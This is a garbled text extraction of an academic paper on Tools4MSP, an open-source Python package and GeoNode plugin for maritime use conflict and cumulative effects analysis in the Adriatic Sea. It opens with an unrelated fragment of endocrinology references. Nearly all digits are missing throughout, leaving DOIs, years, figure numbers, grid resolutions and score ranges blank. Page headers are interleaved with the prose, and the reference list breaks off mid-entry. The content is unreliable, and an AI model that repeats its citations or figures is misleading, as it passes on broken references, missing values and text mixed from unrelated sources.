rabiee a, dwyer aa, caronia lm, hayes fj, yialamas ma, andersen dk, thomas b, torriani m & elahi d. impact of acute biochemical castration on insulin sensitivity in healthy adult men. endocrine research – . (https://doi.org/ . / ) singh ab, hsia s, alaupovic p, sinha-hikim i, woodhouse l, buchanan ta, shen r, bross r, berman n & bhasin s. the effects of varying doses of t on insulin sensitivity, plasma lipids, apolipoproteins, and c-reactive protein in healthy young men. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jcem. . . ) gibb fw, homer nz, faqehi am, upreti r, livingstone de, mcinnes kj, andrew r & walker br. aromatase inhibition reduces insulin sensitivity in healthy men. journal of clinical endocrinology and metabolism – . (https://doi.org/ . /jc. - ) shanbhogue vv, hansen s, jorgensen nr, brixen k & gravholt ch. bone geometry, volumetric density, microarchitecture and estimated bone strength assessed by hr-pqct in klinefelter syndrome.
submitted march accepted september published october corresponding author stefano menegon, stefano.menegon@ismar.cnr.it, ste.menegon@gmail.com academic editor james procter additional information and declarations can be found on page doi . /peerj-cs. copyright menegon et al. distributed under creative commons cc-by .
open access tools msp: an open source software package to support maritime spatial planning stefano menegon, alessandro sarretta, daniel depellegrin, giulio farella, chiara venier and andrea barbanti institute of marine sciences, national research council, venice, italy abstract this paper presents the tools msp software package, a python-based free and open source software (foss) for geospatial analysis in support of maritime spatial planning (msp) and marine environmental management. the suite was initially developed within the adriplan data portal, that has been recently upgraded into the tools msp geoplatform (data.tools msp.eu), an integrated web platform that supports msp through the application of different tools, e.g., collaborative geospatial modelling of cumulative effects assessment (cea) and marine use conflict (muc) analysis. the package can be used as stand-alone library or as collaborative webtool, providing user- friendly interfaces appropriate to decision-makers, regional authorities, academics and msp stakeholders. an effective msp-oriented integrated system of web-based software, users and services is proposed. it includes four components: the tools msp geoplatform for interoperable and collaborative sharing of geospatial datasets and for msp-oriented analysis, the tools msp package as stand-alone library for advanced geospatial and statistical analysis, the desktop applications to simplify data curation and the third party data repositories for multidisciplinary and multilevel geospatial datasets integration. the paper presents an application example of the tools msp geonode plugin and an example of tools msp stand-alone library for cea in the adriatic sea. the tools msp and the developed software have been released as foss under the gpl license and are currently under further development. subjects data science, scientific computing and simulation, spatial and geographic information systems keywords python, sdi, tools msp software, open source, cumulative effects assessment, maritime spatial planning, geonode introduction management and planning of the marine environment require a coordinated development of socio-economic activities, while ensuring a sustainable use of marine resources using an ecosystem-based approach (european union, ; center for ocean solutions, ; douvere, ). in the last decade, practical tools to support the implementation of the various steps of maritime spatial planning (msp) have been developed in various contexts and also analysed to evaluate their usability for different planning purposes (stelzenmüller et al., ; pınarbaşı et al., ). how to cite this article menegon et al. ( ), tools msp: an open source software package to support maritime spatial planning. peerj comput. sci. :e ; doi . /peerj-cs. https://peerj.com mailto:stefano.menegon@ismar.cnr.it mailto:ste.menegon@gmail.com https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://creativecommons.org/licenses/by/ . / http://creativecommons.org/licenses/by/ . / http://dx.doi.org/ . /peerj-cs. an extended analysis performed by the ‘‘ebm tools network’’ (https://ebmtoolsdatabase. org/) in support of ecosystem based management has recollected and classified various tools, with respect to types, costs, skills, data and technological requirements. two categories of tools have emerged in the recent years as analytical support to decision-makers: the sea use conflict analysis and the cumulative impacts assessment. 
sea use conflict analysis has been extensively applied in different geographical contexts (hadjimitsis et al., ; white, halpern & kappel, ) to investigate and spatially identify conflicts between coastal and marine activities for current conditions and for the comparison of possible future scenarios. in particular, the coexist project developed the grid tool (georeferenced interactions database; gramolini et al., ) to analyse the level of coexistence among uses, depicting areas where different sectors more likely overlap in space and time. in parallel, various authors proposed methodologies to create cumulative impact maps to reconnect effects of human uses of the sea on environmental components, starting from the methodology firstly introduced by halpern et al. ( ) at global scale, then implemented in several marine regions, such as baltic sea (korpinen, meidinger & laamanen, ), north sea (andersen et al., ), adriatic sea (depellegrin et al., ) and at regional scale (barbanti et al., a; barbanti et al., b). in particular, stock ( ) developed an open source software for mapping human impacts on marine ecosystems. the msp process involves several user categories, from data producers (e.g., domain experts like ecologists and modellers) to stakeholders and planners. it requires a solid command of geographical information to create a more comprehensive understanding of coastal and marine areas and to support management and planning policies. the development and implementation of spatial data infrastructures (sdi) at multiple levels (i.e., local, regional, national and global) matches the need to make geographical data more accessible and interoperable (georis-creuseveau, claramunt & gourmelon, ). however, various authors (maguire & longley, ) have highlighted the importance of the integration of geoportals in the context of sdis and the role of a user-driven and community-based development as fundamental aspects for an effective and efficient use of the resources (de longueville, ; georis-creuseveau, claramunt & gourmelon, ). this research presents components and functionalities of the tools msp software package, a python-based free and open source software (foss) which implements a marine use conflict (muc) analysis module based on the coexist methodology (gramolini et al., ) and a cumulative effects assessment (cea) module based on the methodology developed in menegon et al. ( a). its implementation in the context of a collaborative geoplatform supporting msp and environmental management and its utilization as stand-alone library for cumulative effects assessment (cea) is tested for the adriatic sea. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://ebmtoolsdatabase.org/ https://ebmtoolsdatabase.org/ http://dx.doi.org/ . /peerj-cs. background muc and cea analysis the maritime use conflict (muc) tool implements the coexist methodology to estimate the spatial distribution of the conflicts between sea uses. the inputs of the tool are: (i) the area of analysis; (ii) the grid cell resolution; (iii) layers of presence/absence for each human use present in the area (e.g., location of aquacultures, location of oil and gas platforms); (iv) an expert based characterization for each human use through four attributes (vertical scale, spatial domain, temporal domain and mobility). according to the attributes of each use three pre-defined rules, included in the coexist methodology are dynamically applied to estimate the potential conflict score for each pair of uses. 
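to make this pairwise scoring concrete, the sketch below shows one possible shape of the computation in python; the per-cell summation follows the description in the next paragraph. the rule_score function is only a placeholder standing in for the three coexist rules, which are not reproduced here, and the attribute names and example values are illustrative assumptions rather than the package's actual api.

```python
from itertools import combinations

# illustrative attribute profiles for human uses; the real coexist
# characterization uses expert-assigned classes for these four attributes.
USES = {
    "aquaculture":        {"vertical": "water column", "spatial": "local", "temporal": "permanent", "mobility": "fixed"},
    "maritime_transport": {"vertical": "surface",      "spatial": "large", "temporal": "seasonal",  "mobility": "mobile"},
    "oil_gas_platforms":  {"vertical": "whole",        "spatial": "local", "temporal": "permanent", "mobility": "fixed"},
}

def rule_score(a, b):
    """Placeholder for the three COEXIST rules: derives a potential conflict
    score for a pair of uses from their four attributes. The logic below is
    NOT the published rule set, only an illustration of the idea."""
    score = 0
    score += 2 if a["vertical"] == b["vertical"] else 1        # shared vertical domain
    score += 2 if a["mobility"] == "fixed" and b["mobility"] == "fixed" else 1
    score += 1 if a["temporal"] == b["temporal"] else 0        # temporal overlap
    return score

# pairwise potential-conflict matrix, computed once per case study
pairwise = {
    frozenset((u, v)): rule_score(USES[u], USES[v])
    for u, v in combinations(USES, 2)
}

def cell_muc_score(uses_in_cell):
    """Total MUC score of one grid cell: the sum of the potential scores of
    every pair of uses that overlap in that cell."""
    return sum(pairwise[frozenset(p)] for p in combinations(sorted(uses_in_cell), 2))

print(cell_muc_score({"aquaculture", "maritime_transport", "oil_gas_platforms"}))
```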
the potential score varies from (no conflict) to (very high conflict). afterwards, the area of analysis is subdivided into regular grid cells according to the specified resolution and, on each cell, information about spatial overlapping human uses are extracted. finally, on each cell the total muc score is calculated summarizing the potential conflict score for each pair of overlapping uses. the main output is a geospatial distribution of muc score over the entire area of analysis. for a detailed explanation of the rules and algorithm we refer to gramolini et al. ( ) and barbanti et al. ( ). the cumulative effects assessment (cea) tool implements the methodology described in menegon et al. ( a). formally, we consider ‘‘cea as a systematic procedure for identifying and evaluating the significance of effects from multiple pressures and/or activities on single or multiple receptors. cea provides management options, by quantifying the overall expected effect caused by multiple pressures and by identifying critical pressures or pressure combinations and vulnerable receptors. the analysis of the causes (source of pressures), pathways, interactions and consequences of these effects on receptors is an essential and integral part of the process’’ (judd, backhaus & goodsir, ). the inputs of the tools msp cea tool are: (i) the area of analysis; (ii) the grid cell resolution; (iii) layers representing intensity or presence/absence of human uses (e.g., intensity of fishery and maritime transport, presence of aquacultures and oil & gas platforms); (iv) layers representing intensity or presence/absence of environmental components (e.g., seabed habitats, probability of presence of nursery habitats, probability of presence of marine mammals); (v) use-specific relative pressure weights and distances of pressure propagation; (vi) environmental component sensitivities related to specific pressures or more general ecological models that describe the response of the environmental components to a specific pressure. similarly to the muc tool, the area of analysis is subdivided into regular grid cells. then, on each cell, information about the presence of human uses and environmental components are extracted. afterwards, the geospatial layers on human uses are propagated and combined to estimate the geospatial distribution of different pressures (e.g., marine litter, underwater noise, abrasion) for the entire analysis area. finally, the geospatial distribution of single and cumulative effects and impacts are estimated combining together the pressure layers and the environmental components layers through a sensitivity score. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure interaction diagram between the tools msp geoplatform, external applications and poten- tial end-users. component .b and (blue background) are developed and released with the tool msp package. full-size doi: . /peerjcs. /fig- the msp-oriented integrated system in fig. the interactions between the tools msp geoplatform, external application and potential end-users are presented. as a whole, they represent an integrated system of software, users and web services capable to effectively support msp activities. overall, the system can be described by four components: component : tools msp geoplatform the geoplatform is a community-based integrated web application. 
data are managed in a sdi over the entire workflow, from the collaborative upload in a web portal, to the creation of metadata, the choice of appropriate visual encodings, the composition of maps, the set up of use cases and the elaboration through specific modules producing final maps and descriptive reports. internally, the tools msp geoplatform is divided into two sub-components: the geospatial content management system (cms; .a) and the tools msp package ( .b). a more detailed description of the geoplatform is given in the next section. component : tools msp package as stand-alone library the package can also be downloaded and used as stand-alone library independently from the geonode software. the library can be efficiently used through jupyter notebook (kluyver et al., ; https://jupyter.org/), a web-based computational environment, which provides one of the most convenient user interfaces for interactive analysis (mcgibbon et al., ; shen, ). the software allows the authoring of shareable and reproducible menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://jupyter.org/ http://dx.doi.org/ . /peerj-cs. notebook documents which allow a combination of input code, rich media representations of the output results, explanatory text, mathematics, images forming a rich computational narrative (kluyver et al., ). regarding the tools msp development, the jupyter notebook supports rapid prototyping of new features, libraries testing and advanced analysis of case studies (fig. , components ). component : desktop applications spatial layers and maps managed in the geoplatform can be downloaded in different formats directly from the web interface or can be reused in desktop gis applications for further investigation by connecting to standard web services. data curation can be also improved using the desktop gis qgis (qgis development team, ) together with the geoserver explorer plugin (boundless, ). this plugin eases the publication, upload and visual encoding of data and layers, allowing collaborators and domain experts to better contribute to the update and maintenance of the geoplatform content. component : third party data repositories msp-related workflows need relevant and updated data to be analysed and processed, the interaction between this component and the tools msp geoplatform highlights the ability of the system to integrate data from other data portals and sdis, such as shape adriatic atlas (http://atlas.shape-ipaproject.eu/), emodnet portals (http: //www.emodnet.eu/), eea services (https://www.eea.europa.eu/data-and-maps), coconet web gis (http://coconetgis.ismar.cnr.it/) or the european atlas of the seas (https: //ec.europa.eu/maritimeaffairs/atlas/maritime_atlas). all these portals use interoperable ogc-compliant web services to exchange spatial information; based on geonode features, the tools msp geoplatform allows users to display external layers (e.g., served from remote web map services; ogc, ) and enriches its catalogue with relevant data through the harvesting of standard web services (geonode remote services). the creation and maintenance of this network of collaborations allow to harmonize existing multiple efforts and improve the availability of spatial datasets for users interested in msp-related information. the tools msp geoplatform in fig. the detailed implementation architecture of the tools msp geoplatform is presented. 
the geospatial cms is the core of the system and is based on the geonode (geonode, developers and contributors team, ) software, a django-based web platform for developing community-based sdi. geonode facilitates the upload and management of geospatial datasets, making them discoverable and available via standard open geospatial consortium (ogc) protocols and web mapping applications. geonode also allows users to automatically upload, describe and share the outputs produced by the tools msp package. the tools msp package is python-based open source software available on github (menegon, a). the tools msp core library implements the algorithms for cea and muc geospatial modelling and the base functionalities to read the input geospatial datasets and configurations, to apply data transformation operations (such as normalization, menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://atlas.shape-ipaproject.eu/ http://www.emodnet.eu/ http://www.emodnet.eu/ https://www.eea.europa.eu/data-and-maps http://coconetgis.ismar.cnr.it/ https://ec.europa.eu/maritimeaffairs/atlas/maritime_atlas https://ec.europa.eu/maritimeaffairs/atlas/maritime_atlas http://dx.doi.org/ . /peerj-cs. figure implementation architecture of the tools msp collaborative geoplatform. full-size doi: . /peerjcs. /fig- aggregation, reclassification, gaussian convolution, geospatial filtering) and to manage and write model output results. tools msp adopts a grid-based approach for efficient numerical computation of the geospatial models. the grid-based functionalities are provided through the general purpose rectifiedgrid library (menegon, b), that ensures direct integration of a multitude of different datasets and facilitates data preparation procedures. it simplifies the access and rasterization of multi-format geospatial data (environmental and anthropogenic datasets) and performs arithmetic and transformation operations on raster map layers. rectifiedgrid combines several foss python projects: ( ) numpy and scipy for efficient numerical computation (van der walt, colbert & varoquaux, ) and ( ) rasterio and fiona (mapbox, rasterio development team, ; fiona, developers and contributors team, ) for multi-format raster and vector data access through the geospatial data abstraction library (gdal; warmerdam, ). interactive graphics for visualization of output results are based on the bokeh visualization library (bokeh development team, ). different users can have different modes of interaction with the geoplatform: administrators perform the case study setup, by specifying the connectors to the geospatial repositories and defining the pre-processing chain for environmental and human use layers harmonization and utilization in the case study (fig. , case study setup gui). a broad user community composed by decision-makers, planners, academics, research institutions, msp stakeholders and the general public can use the case study configuration to run the build-in version of the tools msp library implemented in the geoplatform (fig. , webtool gui). more in detail, the tools msp webtool gui implements a four step menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. 
workflow: (step ) webtool selection (muc or cea); (step ) case study selection, choosing from a pre-set of case studies; (step ) case study configuration, optionally outlining a custom subregion of analysis or a custom combination of human uses, pressures, and environmental components; (step ) generation of geospatial and statistical outputs. the outputs are published in geonode and accessible through standard interoperable services. the produced reports, graphics and statistical outputs are archived in a dedicated data store catalogue and can be further visualized and re-used also by non technical stakeholders. in the results section an application of the tools msp geonode plugin for case study setup and cea analysis in the adriatic sea is provided. results at the current stage, the tools msp modelling framework has been applied in various areas of interest in the adriatic sea, such as entire adriatic sea (depellegrin et al., ), italian adriatic sea (menegon et al., a) and regional scale analysis for the northern adriatic sea (menegon et al., b) and emilia-romagna region (barbanti et al., a; barbanti et al., b). in the following section results for tools msp geonode plugin and stand-alone library for the adriatic sea will be presented. application of tools msp geonode plugin the tools msp geonode plugin implements two sets of interfaces: the case study setup gui and the webtool gui. in fig. an example of gui illustrating a case study setup is presented. the interface is intended for administrators and was designed to facilitate the configuration of case study input parameters. the gui is organized in sections: (i) basic parameters (fig. a); (ii) human uses (fig. b); (iii) environmental components (fig. c); (iv) pressures (fig. d). in the example the case study named ‘‘adriatic sea ’’ has a grid resolution of m and the area of analysis is the adriatic sea (fig. e). figure f shows the expanded view of geospatial dataset set up for ‘‘maritime transport’’. specific data transformation operations have been configured through the ‘‘pre-processing expression’’ field. the expression is written with a python-based syntax that allows the user to select and combine one or more layers, apply filters, apply masking conditions, perform grid-cell-based arithmetic and other data transformations (e.g., normalization, logarithmic scaling, gaussian convolution). the resulting geospatial dataset is shown as thumbnail directly into the case study setup gui (fig. f). the example reported in fig. f refers to a human use (maritime transport) but is equally valid to environmental components or pressures. the webtool gui is the standard interface allowing non-technical users (e.g., decision- makers, msp stakeholders, planners) to perform cea and muc analyses starting from the pre-set case studies. the webtool gui implements a four-steps workflow: (step ) webtool selection; (step ) case study area selection; (step ) study area selection & dataset configuration; (step ) geospatial and statistical outputs. an example of the outputs (step : results) for the case study ‘‘adriatic sea ’’ is shown in fig. . through the gui, the geospatial menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure example of case study setup graphical user interface. full-size doi: . /peerjcs. /fig- distribution of cea for the analysis area as well as the statistical outputs can be explored and downloaded. 
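the pre-processing expression syntax itself is specific to the geoplatform and is not reproduced here; the snippet below only illustrates, with plain numpy and scipy operations, the kinds of grid-cell transformations such an expression can chain (masking, normalization, logarithmic scaling, gaussian convolution). the array shape and parameter values are arbitrary assumptions.

```python
import numpy as np
from scipy.ndimage import gaussian_filter

# a toy intensity layer on a regular grid (e.g., maritime traffic density)
rng = np.random.default_rng(0)
layer = rng.gamma(shape=2.0, scale=3.0, size=(200, 300))

# mask cells outside the area of analysis (here: an arbitrary rectangle)
area_mask = np.zeros_like(layer, dtype=bool)
area_mask[20:180, 30:270] = True
layer = np.where(area_mask, layer, 0.0)

# logarithmic scaling to compress heavy-tailed intensities
layer = np.log1p(layer)

# gaussian convolution, e.g., to smooth point observations over neighbouring cells
layer = gaussian_filter(layer, sigma=2.0)

# min-max normalization to [0, 1]
layer = (layer - layer.min()) / (layer.max() - layer.min())

print(layer.shape, float(layer.min()), float(layer.max()))
```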
a complete example of muc and cea analysis through the tools msp webtool gui including a more in-depth investigation on its strengths and limitations in support of maritime spatial planning is available in menegon et al. ( b). application of tools msp package as stand-alone library in this section we present a cumulative effects assessment based on the stand-alone tools msp package applied for the adriatic sea. the case study set up has been downloaded from the tools msp geoplatform. it consists of a directory named ‘‘adriatic_sea’’ containing the input geospatial layers related to human uses, environmental components and pressures and environmental component sensitivities. an example of the case study set up is released within the tools msp software package (https://github.com/cnr- ismar/tools msp/tree/master/data/demo_case_study) and is available for test and demo purposes. the case study is presented using a workflow implemented through the jupyter computational environment including the following steps (fig. ): • in [ ] import libraries: tools msp casestudy class, rectifiedgrid using the rg alias, matplotlib and numpy. casestudy is a comprehensive class that provides the methods to setup a case study (e.g., specify datasets and input parameters) or alternatively to load a predefined case study, perform the analysis and manage the results. • in [ ] load predefined case study for adriatic sea ( km × km resolution). after instantiating the casestudy class specifying the ‘‘adriatic_sea’’ case study, the methods load_layers and load_inputs are called in order to import the environmental, pressure and menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- https://github.com/cnr-ismar/tools msp/tree/master/data/demo_case_study https://github.com/cnr-ismar/tools msp/tree/master/data/demo_case_study http://dx.doi.org/ . /peerj-cs. figure example of graphical user interface presenting geospatial and statistical results. full-size doi: . /peerjcs. /fig- human use layers (including the layer metadata) and the input parameters respectively (e.g., sensitivity scores). • in [ ] print example case study setup providing general information on spatial extent (in number of cells) and number of available layers (geospatial datasets). the input geospatial layers and the area of analysis layer (.grid parameter) are instances of the rectifiedgrid class. rectifiedgrid is the main class provided by the rectifiedgrid library and it is designed to represent and manipulate d georeferenced data arrays. rectifiedgrid provides the ‘‘.plotmap’’ method to plot the layer and other information (e.g., coastline, rivers) on a map. • in [ ] cea analysis function. the casestudy class exposes the ‘‘.cumulative_impact’’ method to perform a cumulative effects assessment (menegon et al., a). • in [ ] cea geospatial results and graphical outputs for the adriatic sea. the map of the cea result is visualized using the ‘‘.plotmap’’ method in combination with the distribution of cea values of the grid cells. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. figure workflow for tools msp stand-alone library application using jupyter computational envi- ronment. full-size doi: . /peerjcs. /fig- menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. 
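read as a sketch of the stand-alone workflow just described: the class, module and method names (casestudy, rectifiedgrid with the rg alias, load_layers, load_inputs, cumulative_impact, plotmap) are taken from the description above, but the exact import paths, argument names and return types are assumptions and may differ from the released package.

```python
# sketch of the stand-alone usage described above; not verified against the
# released tools msp api (import paths and signatures are assumed).
import matplotlib.pyplot as plt
import numpy as np
import rectifiedgrid as rg                     # imported as in the described workflow
from toolsmsp import CaseStudy                 # assumed module/class naming

# load a pre-set case study downloaded from the geoplatform
cs = CaseStudy("adriatic_sea")                 # directory with layers and input parameters
cs.load_layers()                               # human uses, environmental components, pressures
cs.load_inputs()                               # sensitivity scores, weights, propagation distances

# run the cumulative effects assessment and inspect the result
cea = cs.cumulative_impact()                   # assumed to return a georeferenced grid
print("grid cells:", cea.shape)

# map of the cea score plus the distribution of per-cell values
cea.plotmap()                                  # plotting helper named in the text
plt.figure()
plt.hist(np.asarray(cea).ravel(), bins=50)
plt.xlabel("cea score")
plt.ylabel("number of cells")
plt.show()
```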
table software characteristics, requirements and availability for the rectifiedgrid library and the tools msp package.
language: rectifiedgrid, python; tools msp, python.
operating system: rectifiedgrid, platform-independent (requires a python distribution); tools msp, platform-independent (requires a python distribution).
dependencies: rectifiedgrid, numpy, geopandas, scipy, rasterio, fiona, shapely, rtree, affine, matplotlib, gdal; tools msp, rectifiedgrid, bokeh, geonode (for plugin usage).
software location: rectifiedgrid, doi: . /zenodo. ; tools msp, doi: . /zenodo. .
code repository: rectifiedgrid, https://github.com/cnr-ismar/rectifiedgrid; tools msp, https://github.com/cnr-ismar/tools msp.
license: rectifiedgrid, gpl; tools msp, gpl.
software details in table the summary of the main characteristics and requirements of rectifiedgrid and tools msp is presented. discussion and conclusions this paper presents architecture, implementation and practical application of an msp-oriented software package named tools msp. the tool is presented as geonode plugin and as a stand-alone library determining different levels of usability by different user groups. as a plugin, tools msp supports a wide user community that facilitates the implementation of collaborative analyses improving the reusability and sharing of the result outputs. the integration within a geospatial cms allows to manage the entire processing data workflow, from the collaborative upload in a web portal, to the creation of metadata, the choice of appropriate visual encodings, the composition of maps, the set up of use cases and the elaboration through specific modules producing final maps and descriptive reports. the usage of the plugin is particularly suitable as it provides a user-friendly interface appropriate to decision-makers, regional authorities, academics and msp stakeholders (e.g., fishers, engos, industry). the plugin eases data transformation operations reducing the need of manual data preparation and standardization procedures. furthermore, archiving the pre-processing expressions in combination with the case study makes the transformation of the input data more explicit and the entire process more transparent and replicable. as stand-alone library, tools msp requires advanced programming skills for its usage, but provides more flexible integration with other libraries and python packages also outside tools msp modelling framework. it is particularly suitable for planning authorities seeking advanced modelling procedure for msp/iczm and management purposes. the scientific community, consultancies and programmers can use and further develop the library for different research objectives and integration into decision-support-systems. compared to other existing decision support tools in msp, the tools msp "approach" is more flexible as it ( ) incorporates a multi-objective toolset (cea and muc) which can be extended for other analysis purposes (e.g., scenario analysis, comparative msp or ecosystem services assessment); ( ) it enables management and treatment of different datasets and formats and ( ) it provides different levels of usability ranging from experienced modellers to more user-friendly modelling through guis.
the tools cea and muc models implemented can support the development of maritime spatial plans within the implementation process of the msp directive ( / /ce) in various case study areas and marine waters in the mediterranean sea and beyond. the package is regularly upgraded within the tools msp geoplatform (data.tools msp.eu) including ongoing implementations of pressure specific analysis of cea, cea backsourcing (cea-b; menegon et al., a) and the integration of marine ecosystem services oriented analysis of anthropogenic threats (mes-threat) in support of environmental management and resource restoration (depellegrin & blažauskas, ; menegon et al., b). the tools msp software package was used in adriplan (adriatic and ionian maritime spatial planning) and ritmare (ricerca italiana per il mare) projects and is currently implemented by various research communities within ongoing european projects around the mediterranean, such as supreme (supporting maritime spatial planning in the eastern mediterranean) or portodimare (geoportal of tools & data for sustainable management of coastal and marine environment). acknowledgements we would like to thank the editor and the three reviewers for valuable comments contributing to the overall improvement of the manuscript. additional information and declarations funding this work was supported by the flagship project ritmare—italian research for the sea, coordinated by the italian national research council and funded by the italian ministry of education, university and research within the national research program – . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: flagship project ritmare—italian research for the sea. italian ministry of education, university. national research program – . competing interests the authors declare there are no competing interests. author contributions • stefano menegon analyzed the data, contributed reagents/materials/analysis tools, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. • alessandro sarretta and daniel depellegrin contributed reagents/materials/analysis tools, authored or reviewed drafts of the paper, approved the final draft. • giulio farella and chiara venier contributed reagents/materials/analysis tools. • andrea barbanti contributed reagents/materials/analysis tools, founding acquisition, supervision. data availability the following information was supplied regarding data availability: stefano menegon. ( , february ). tools msp: geospatial tools to support maritime spatial planning (version . . -beta. ). zenodo. doi . /zenodo. . stefano menegon. ( , february ). rectifiedgrid: geospatial python library for grid-based analyses (version . . -beta. ). zenodo. doi . /zenodo. . references andersen jh, stock a, heinänen s, mannerla m, vinther m. . human uses, pressures and impacts in the eastern north sea. technical report from dce— danish centre for environment and energy no. . aarhus: aarhus university. available at http://www.dmu.dk/pub/tr .pdf . barbanti a, campostrini p, musco f, sarretta a, gissi e. . developing a mar- itime spatial plan for the adriatic ionian region. zenodo. venice: cnr-ismar. doi . /zenodo. . 
barbanti a, sarretta a, venier c, bellaciccio s, depellegrin d, farella g, mene- gon s, lorito s, grati f, bolognini l, perini l. a. sviluppo ed analisi di proposte di iczm-msp in aree specifiche: costa emiliano-romagnola. volume : quadro conoscitivo di riferimento e sua analisi ai fini della pianificazione dello spazio marittimo icm-msp nella regione adriatico ionica. zenodo. doi . /zenodo. . barbanti a, sarretta a, venier c, bellacicco s, farella g, menegon s, depellegrin d, lorito s, grati f, bolognini l, perini l, pastres r, porporato e. b. sviluppo ed analisi di proposte di iczm-msp in aree specifiche: costa emiliano-romagnola. volume : individuazione ed analisi dei possibili obiettivi gestionali e delle misure per attuarli. zenodo. doi . /zenodo. . bokeh development team. . bokeh: python library for interactive visualization. available at http://www.bokeh.pydata.org/ (accessed on february ). boundless. . geoserver explorer plugin for qgis. available at http://boundlessgeo. github.io/qgis-plugins-documentation/geoserver/ (accessed on february ). center for ocean solutions. . decision guide for selecting decision support tools for marine spatial planning. technical report. stanford: the woods institute for the environment, stanford university. de longueville b. . community-based geoportals: the next generation? concepts and methods for the geospatial web . . computers, environment and urban systems ( ): – doi . /j.compenvurbsys. . . . menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://doi.org/ . /zenodo. http://doi.org/ . /zenodo. http://www.dmu.dk/pub/tr .pdf http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://dx.doi.org/ . /zenodo. http://www.bokeh.pydata.org/ http://boundlessgeo.github.io/qgis-plugins-documentation/geoserver/ http://boundlessgeo.github.io/qgis-plugins-documentation/geoserver/ http://dx.doi.org/ . /j.compenvurbsys. . . http://dx.doi.org/ . /peerj-cs. depellegrin d, blažauskas n. . integrating ecosystem service values into oil spill im- pact assessment. journal of coastal research ( ): – doi . /jcoastres-d- - . . depellegrin d, menegon s, farella g, ghezzo m, gissi e, sarretta a, venier c, barbanti a. . multi-objective spatial tools to inform maritime spatial planning in the adriatic sea. science of the total environment : – doi . /j.scitotenv. . . . douvere f. . the importance of marine spatial planning in advancing ecosystem- based sea use management. marine policy ( ): – doi . /j.marpol. . . . european union. . directive / /eu of the the european parliament and of the council of july establishing a framework for maritime spatial planning. o.j. l / . available at https://eur-lex.europa.eu/legal-content/en/txt/?uri= celex% a l . fiona, developers and contributors team. . fiona is ogr’s neat, nimble, no- nonsense api for python programmers. available at http://toblerity.org/fiona/ (accessed on february ). geonode, developers and contributors team. . geonode: open source geospatial content management system. available at http://geonode.org/ (accessed on february ). georis-creuseveau j, claramunt c, gourmelon f. . a modelling framework for the study of spatial data infrastructures applied to coastal management and planning. international journal of geographical information science : – doi . / . . . gramolini r, grati f, fabi g, schule t. . grid georeference interactions database. deliverable d coexist project. interaction in coastal waters: a roadmap to sustainable integration of aquaculture and fisheries. 
available at http://www. coexistproject.eu/images/coexist/tools/grid.pdf . hadjimitsis dg, agapiou a, themistocleous k, mettas c, evagorou e, papoutsa c, nisantzi a, mammouri r, tzouvaras m, lysssandrou v. . resolving sea and land conflicts in cyprus using marine spatial planning. in: proceedings of the th international conference on environmental science and technology cest . athens, greece. halpern bs, mcleod kl, rosenberg aa, crowder lb. . managing for cumulative impacts in ecosystem-based management through ocean zoning. ocean & coastal management ( ): – doi . /j.ocecoaman. . . . judd ad, backhaus t, goodsir f. . an effective set of principles for practical implementation of marine cumulative effects assessment. environmental science & policy : – doi . /j.envsci. . . . kluyver t, ragan-kelley b, pérez f, granger b, bussonnier m, frederic j, kel- ley k, hamrick j, grout j, corlay s, ivanov p, avila d, abdalla s, willing c. menegon et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /jcoastres-d- - . http://dx.doi.org/ . /j.scitotenv. . . http://dx.doi.org/ . /j.marpol. . . https://eur-lex.europa.eu/legal-content/en/txt/?uri=celex% a l https://eur-lex.europa.eu/legal-content/en/txt/?uri=celex% a l http://toblerity.org/fiona/ http://geonode.org/ http://dx.doi.org/ . / . . http://www.coexistproject.eu/images/coexist/tools/grid.pdf http://www.coexistproject.eu/images/coexist/tools/grid.pdf http://dx.doi.org/ . /j.ocecoaman. . . http://dx.doi.org/ . /j.envsci. . . http://dx.doi.org/ . /peerj-cs. . jupyter notebooks—a publishing format for reproducible computa- tional workflows. in: loizides f, schmidt b, eds. positioning and power in aca- demic publishing: players, agents and agendas. amsterdam: ios press, – doi . / - - - - - . korpinen s, meidinger m, laamanen m. . cumulative impacts on seabed habitats: an indicator for assessments of good environmental status. marine pollution bulletin ( ): – doi . /j.marpolbul. . . . maguire dj, longley pa. . the emergence of geoportals and their role in spatial data infrastructures. computers, environment and urban systems ( ): – doi . /s - ( ) - . mapbox, rasterio development team. . rasterio: access to geospatial raster data. available at https://mapbox.github.io/rasterio/ (accessed on february ). mcgibbon rt, beauchamp ka, harrigan mp, klein c, swails jm, hernández cx, schwantes cr, wang l-p, lane tj, pande vs. . mdtraj: a modern open library for the analysis of molecular dynamics trajectories. biophysical journal : – doi . /j.bpj. . . . menegon s. a. tools msp geospatial tools to support maritime spatial planning. zenodo. version . . -beta. . doi . /zenodo. . menegon s. b. rectifiedgrid geospatial python library for geospatial grid-based analyses. zenodo. version . . -beta. . doi . /zenodo. . menegon s, depellegrin d, farella g, gissi e, ghezzo m, sarretta a, venier 